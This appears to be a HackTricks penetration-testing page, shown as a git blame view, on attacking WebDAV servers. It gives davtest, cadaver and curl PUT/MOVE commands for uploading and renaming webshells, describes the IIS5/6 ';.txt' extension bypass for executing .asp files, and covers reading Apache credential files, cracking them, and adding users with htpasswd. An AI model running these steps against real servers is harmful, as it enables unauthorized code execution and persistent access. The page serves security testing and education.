hacktricks/network-services-pentesting/pentesting-web/put-method-webdav.md

153 lines
7.2 KiB
Markdown
Raw Permalink Normal View History

2022-05-01 13:25:53 +00:00
# WebDav
2022-04-28 16:01:33 +00:00
2024-05-05 17:56:05 +00:00
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
2022-09-01 23:40:55 +00:00
\
2024-04-30 15:47:06 +00:00
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
2022-09-01 23:40:55 +00:00
Get Access Today:
2024-04-30 15:47:06 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
2022-09-01 23:40:55 +00:00
2024-07-19 09:08:05 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 09:08:05 +00:00
<details>
2022-04-28 16:01:33 +00:00
2024-07-19 09:08:05 +00:00
<summary>Support HackTricks</summary>
2023-12-31 01:24:39 +00:00
2024-07-19 09:08:05 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2024-07-19 09:08:05 +00:00
{% endhint %}
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-02-08 21:36:15 +00:00
When dealing with a **HTTP Server with WebDav** enabled, it's possible to **manipulate files** if you have the right **credentials**, usually verified through **HTTP Basic Authentication**. Gaining control over such a server often involves the **upload and execution of a webshell**.
2024-02-08 21:36:15 +00:00
Access to the WebDav server typically requires **valid credentials**, with [**WebDav bruteforce**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) being a common method to acquire them.
2024-02-08 21:36:15 +00:00
To overcome restrictions on file uploads, especially those preventing the execution of server-side scripts, you might:
* **Upload** files with **executable extensions** directly if not restricted.
* **Rename** uploaded non-executable files (like .txt) to an executable extension.
* **Copy** uploaded non-executable files, changing their extension to one that is executable.
2022-05-01 13:25:53 +00:00
## DavTest
2021-11-30 16:46:07 +00:00
**Davtest** try to **upload several files with different extensions** and **check** if the extension is **executed**:
```bash
davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension
```
Output sample:
2024-05-05 17:56:05 +00:00
![](<../../.gitbook/assets/image (851).png>)
2021-11-30 16:46:07 +00:00
This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web.
2022-05-01 13:25:53 +00:00
## Cadaver
2021-11-30 16:46:07 +00:00
You can use this tool to **connect to the WebDav** server and perform actions (like **upload**, **move** or **delete**) **manually**.
```
cadaver <IP>
```
2022-05-01 13:25:53 +00:00
## PUT request
```
curl -T 'shell.txt' 'http://$ip'
```
2022-05-01 13:25:53 +00:00
## MOVE request
```
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
```
2024-05-05 17:56:05 +00:00
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
2022-09-01 23:40:55 +00:00
\
2024-04-30 15:47:06 +00:00
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
2022-09-01 23:40:55 +00:00
Get Access Today:
2024-04-30 15:47:06 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
2022-09-01 23:40:55 +00:00
2022-05-01 13:25:53 +00:00
## IIS5/6 WebDav Vulnerability
2021-11-30 16:46:07 +00:00
This vulnerability is very interesting. The **WebDav** does **not allow** to **upload** or **rename** files with the extension **.asp**. But you can **bypass** this **adding** at the end of the name **";.txt"** and the file will be **executed** as if it were a .asp file (you could also **use ".html" instead of ".txt"** but **DON'T forget the ";"**).
2021-11-30 16:46:07 +00:00
Then you can **upload** your shell as a ".**txt" file** and **copy/move it to a ".asp;.txt"** file. An accessing that file through the web server, it will be **executed** (cadaver will said that the move action didn't work, but it did).
2024-05-05 17:56:05 +00:00
![](<../../.gitbook/assets/image (1092).png>)
2022-05-01 13:25:53 +00:00
## Post credentials
If the Webdav was using an Apache server you should look at configured sites in Apache. Commonly:\
_**/etc/apache2/sites-enabled/000-default**_
Inside it you could find something like:
```
ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user
```
2022-04-05 22:24:52 +00:00
As you can see there is the files with the valid **credentials** for the **webdav** server:
```
/etc/apache2/users.password
```
2021-11-30 16:46:07 +00:00
Inside this type of files you will find the **username** and a **hash** of the password. These are the credentials the webdav server is using to authenticate users.
2021-11-30 16:46:07 +00:00
You can try to **crack** them, or to **add more** if for some reason you wan to **access** the **webdav** server:
```bash
htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
```
To check if the new credentials are working you can do:
```bash
wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q
```
2022-04-28 16:01:33 +00:00
2024-02-08 21:36:15 +00:00
## References
2024-02-08 21:36:15 +00:00
* [https://vk9-sec.com/exploiting-webdav/](https://vk9-sec.com/exploiting-webdav/)
2024-07-19 09:08:05 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2024-02-08 21:36:15 +00:00
2022-04-28 16:01:33 +00:00
<details>
2024-07-19 09:08:05 +00:00
<summary>Support HackTricks</summary>
2022-04-28 16:01:33 +00:00
2024-07-19 09:08:05 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2024-07-19 09:08:05 +00:00
{% endhint %}
</details>
{% endhint %}
2022-09-01 23:40:55 +00:00
2024-05-05 17:56:05 +00:00
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
2022-09-01 23:40:55 +00:00
\
2024-04-30 15:47:06 +00:00
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
2022-09-01 23:40:55 +00:00
Get Access Today:
2024-04-30 15:47:06 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}